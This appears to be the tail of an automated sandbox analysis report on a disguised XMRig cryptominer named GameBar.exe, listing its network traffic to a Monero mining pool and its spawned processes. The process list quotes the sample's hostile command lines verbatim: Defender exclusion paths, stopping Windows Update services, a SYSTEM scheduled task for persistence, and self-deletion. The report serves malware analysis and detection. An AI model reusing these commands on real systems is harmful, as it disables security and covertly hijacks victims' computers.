May 23, 2023 02:12:06.812160015 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:12:06.856889963 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:12:17.053827047 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:12:17.170361042 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:12:27.341130972 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:12:27.390557051 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:12:27.517484903 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:12:27.561856031 CEST	49700	443	192.168.2.3	141.94.96.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2023 02:11:27.543790102 CEST	56924	53	192.168.2.3	8.8.8.8
May 23, 2023 02:11:27.577330112 CEST	53	56924	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2023 02:11:27.543790102 CEST	192.168.2.3	8.8.8.8	0x5a16	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2023 02:11:27.577330112 CEST	8.8.8.8	192.168.2.3	0x5a16	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2023 02:11:27.577330112 CEST	8.8.8.8	192.168.2.3	0x5a16	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
May 23, 2023 02:11:27.577330112 CEST	8.8.8.8	192.168.2.3	0x5a16	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
May 23, 2023 02:11:27.577330112 CEST	8.8.8.8	192.168.2.3	0x5a16	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49700	141.94.96.144	443	C:\Windows\System32\dwm.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-23 00:11:27 UTC	0	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 38 45 7a 52 39 53 7a 75 71 47 66 32 53 31 67 58 56 54 6b 70 45 44 72 45 68 5a 36 57 70 4a 58 33 4b 4b 73 47 36 5a 78 4d 69 34 34 37 6e 6b 59 37 4c 51 65 4e 34 70 37 59 65 31 33 74 6b 77 37 47 33 4b 47 44 4b 70 35 51 33 43 34 37 5a 55 73 51 70 73 53 58 7a 41 32 37 74 54 33 7a 38 32 22 2c 22 70 61 73 73 22 3a 22 41 6c 70 68 61 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 72 69 67 69 64 22 Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48EzR9SzuqGf2S1gXVTkpEDrEhZ6WpJX3KKsG6ZxMi447nkY7LQeN4p7Ye13tkw7G3KGDKp5Q3C47ZUsQpsSXzA27tT3z82","pass":"Alpha","agent":"XMRig/6.19.0 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2019","rigid"
2023-05-23 00:11:27 UTC	0	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 31 64 66 38 38 62 64 2d 64 63 30 33 2d 34 30 62 62 2d 62 35 35 36 2d 63 32 34 37 34 62 65 36 31 64 35 35 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 64 38 39 62 30 61 33 30 36 39 61 33 34 63 36 35 66 33 34 33 64 39 61 30 62 63 65 36 37 32 33 37 66 31 31 65 62 36 37 36 35 65 63 63 63 31 34 64 62 33 33 30 62 38 31 36 61 36 33 62 62 30 66 66 36 65 37 36 32 63 61 64 39 30 30 30 30 30 30 30 30 39 66 63 32 39 66 30 35 30 64 37 35 66 39 38 37 39 61 35 62 35 64 62 37 30 63 61 39 35 39 62 37 36 36 35 63 33 33 34 32 33 37 37 34 39 32 33 66 38 33 30 38 35 31 32 66 39 30 33 34 63 33 35 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"11df88bd-dc03-40bb-b556-c2474be61d55","job":{"blob":"10109d89b0a3069a34c65f343d9a0bce67237f11eb6765eccc14db330b816a63bb0ff6e762cad9000000009fc29f050d75f9879a5b5db70ca959b7665c33423774923f8308512f9034c35
2023-05-23 00:12:06 UTC	1	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 36 38 39 62 30 61 33 30 36 39 62 66 33 31 65 65 38 64 66 34 38 33 64 37 62 64 62 35 34 34 62 35 38 39 37 65 37 31 32 36 64 31 66 34 61 34 35 66 33 63 63 33 61 62 30 63 37 64 63 38 62 37 36 61 39 66 33 35 35 36 62 36 31 30 30 30 30 30 30 30 30 36 36 34 31 31 30 35 61 31 39 38 34 31 39 39 37 63 64 63 62 30 66 61 34 30 64 65 63 33 62 34 32 62 39 62 30 38 30 66 37 32 62 31 35 32 64 63 64 30 61 63 35 33 33 65 32 39 63 61 65 30 64 33 30 30 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 79 4e 50 30 2b 35 62 6c 68 58 6c 50 6b 74 66 49 67 4c 36 31 38 52 6f 32 42 76 48 4b 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d689b0a3069bf31ee8df483d7bdb544b5897e7126d1f4a45f3cc3ab0c7dc8b76a9f3556b61000000006641105a19841997cdcb0fa40dec3b42b9b080f72b152dcd0ac533e29cae0d3006","job_id":"yNP0+5blhXlPktfIgL618Ro2BvHK","target":"8
2023-05-23 00:12:17 UTC	1	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 30 38 39 62 30 61 33 30 36 39 62 66 33 31 65 65 38 64 66 34 38 33 64 37 62 64 62 35 34 34 62 35 38 39 37 65 37 31 32 36 64 31 66 34 61 34 35 66 33 63 63 33 61 62 30 63 37 64 63 38 62 37 36 61 39 66 33 35 35 36 62 36 31 30 30 30 30 30 30 30 30 34 32 31 62 35 33 31 36 36 66 32 63 62 62 32 62 65 63 39 30 66 61 64 30 35 31 36 66 66 38 33 30 39 33 64 65 39 35 38 63 31 61 37 33 62 34 39 33 62 62 36 32 64 30 32 35 35 30 62 37 66 30 34 34 30 39 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 49 48 63 68 34 67 61 41 43 4b 34 45 32 32 43 64 54 66 63 50 30 6f 34 68 63 76 68 5a 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e089b0a3069bf31ee8df483d7bdb544b5897e7126d1f4a45f3cc3ab0c7dc8b76a9f3556b6100000000421b53166f2cbb2bec90fad0516ff83093de958c1a73b493bb62d02550b7f04409","job_id":"IHch4gaACK4E22CdTfcP0o4hcvhZ","target":"8
2023-05-23 00:12:27 UTC	1	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 62 38 39 62 30 61 33 30 36 39 62 66 33 31 65 65 38 64 66 34 38 33 64 37 62 64 62 35 34 34 62 35 38 39 37 65 37 31 32 36 64 31 66 34 61 34 35 66 33 63 63 33 61 62 30 63 37 64 63 38 62 37 36 61 39 66 33 35 35 36 62 36 31 30 30 30 30 30 30 30 30 37 32 62 30 61 61 33 66 38 30 30 33 32 33 36 63 33 62 62 30 33 34 63 61 38 63 35 38 37 35 36 37 36 33 35 36 35 33 39 66 62 32 31 35 36 34 65 37 64 62 63 65 38 32 32 36 66 34 31 65 35 31 38 63 30 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 45 31 47 6b 70 42 59 39 64 31 45 57 6d 48 63 64 34 36 71 39 34 62 32 77 4b 66 47 48 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eb89b0a3069bf31ee8df483d7bdb544b5897e7126d1f4a45f3cc3ab0c7dc8b76a9f3556b610000000072b0aa3f8003236c3bb034ca8c5875676356539fb21564e7dbce8226f41e518c0a","job_id":"E1GkpBY9d1EWmHcd46q94b2wKfGH","target":"8
2023-05-23 00:12:27 UTC	2	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 62 38 39 62 30 61 33 30 36 37 32 61 65 36 36 62 36 37 33 38 36 37 36 34 35 31 63 34 31 30 61 33 35 64 66 34 30 34 37 32 64 30 31 38 66 34 39 62 30 65 31 66 64 66 31 30 64 32 37 34 61 64 32 35 37 61 62 32 31 63 64 65 64 30 30 30 30 30 30 30 30 39 34 32 30 33 31 38 61 32 36 61 36 65 63 32 36 66 39 32 39 64 30 32 32 31 32 63 32 62 62 34 36 64 62 33 37 31 65 34 38 66 61 35 62 38 33 61 31 33 66 61 66 31 65 34 37 31 36 32 66 32 33 31 38 30 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 77 69 6f 77 57 35 4e 37 33 43 7a 4c 41 66 72 61 59 71 49 70 2f 4f 64 2b 2b 71 67 54 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eb89b0a30672ae66b6738676451c410a35df40472d018f49b0e1fdf10d274ad257ab21cded000000009420318a26a6ec26f929d02212c2bb46db371e48fa5b83a13faf1e47162f231804","job_id":"wiowW5N73CzLAfraYqIp/Od++qgT","target":"8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: GameBar.exePID: 7164, Parent PID: 3452

General

Target ID:	0
Start time:	02:10:03
Start date:	23/05/2023
Path:	C:\Users\user\Desktop\GameBar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\GameBar.exe
Imagebase:	0x7ff6721f0000
File size:	6132520 bytes
MD5 hash:	8EFB0A8FD404D31541B7592CAE776E58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6080, Parent PID: 3452

General

Target ID:	1
Start time:	02:10:05
Start date:	23/05/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6cbac0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5756, Parent PID: 6080

General

Target ID:	2
Start time:	02:10:05
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7208, Parent PID: 3452

General

Target ID:	4
Start time:	02:10:10
Start date:	23/05/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7216, Parent PID: 7208

General

Target ID:	5
Start time:	02:10:10
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 7244, Parent PID: 7208

General

Target ID:	6
Start time:	02:10:10
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 7260, Parent PID: 7208

General

Target ID:	7
Start time:	02:10:10
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 7276, Parent PID: 7208

General

Target ID:	8
Start time:	02:10:10
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 7292, Parent PID: 7208

General

Target ID:	9
Start time:	02:10:10
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 7308, Parent PID: 7208

General

Target ID:	10
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7328, Parent PID: 3452

General

Target ID:	11
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7336, Parent PID: 7328

General

Target ID:	12
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7344, Parent PID: 3452

General

Target ID:	13
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6cbac0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7372, Parent PID: 7344

General

Target ID:	14
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 7380, Parent PID: 7328

General

Target ID:	15
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 7460, Parent PID: 7328

General

Target ID:	16
Start time:	02:10:11
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 7496, Parent PID: 7328

General

Target ID:	17
Start time:	02:10:12
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 7512, Parent PID: 7328

General

Target ID:	18
Start time:	02:10:12
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7912, Parent PID: 3452

General

Target ID:	23
Start time:	02:10:42
Start date:	23/05/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\GameBar.exe"
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GameBar.exePID: 7948, Parent PID: 1080

General

Target ID:	24
Start time:	02:10:42
Start date:	23/05/2023
Path:	C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
Imagebase:	0x7ff6d93b0000
File size:	6132520 bytes
MD5 hash:	8EFB0A8FD404D31541B7592CAE776E58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 51%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7956, Parent PID: 7912

General

Target ID:	25
Start time:	02:10:42
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: choice.exePID: 7984, Parent PID: 7912

General

Target ID:	26
Start time:	02:10:42
Start date:	23/05/2023
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff74e3d0000
File size:	33280 bytes
MD5 hash:	EA29BC6BCB1EFCE9C9946C3602F3E754
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 8020, Parent PID: 3452

General

Target ID:	27
Start time:	02:10:46
Start date:	23/05/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6cbac0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exePID: 8028, Parent PID: 8020

General

Target ID:	28
Start time:	02:10:46
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 8168, Parent PID: 3452

General

Target ID:	29
Start time:	02:10:49
Start date:	23/05/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 8176, Parent PID: 8168

General

Target ID:	30
Start time:	02:10:49
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 7152, Parent PID: 8168

General

Target ID:	31
Start time:	02:10:49
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5208, Parent PID: 8168

General

Target ID:	32
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6092, Parent PID: 8168

General

Target ID:	33
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5792, Parent PID: 8168

General

Target ID:	34
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6036, Parent PID: 8168

General

Target ID:	35
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6dc8d0000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5196, Parent PID: 3452

General

Target ID:	36
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6016, Parent PID: 5196

General

Target ID:	37
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 416, Parent PID: 5196

General

Target ID:	38
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

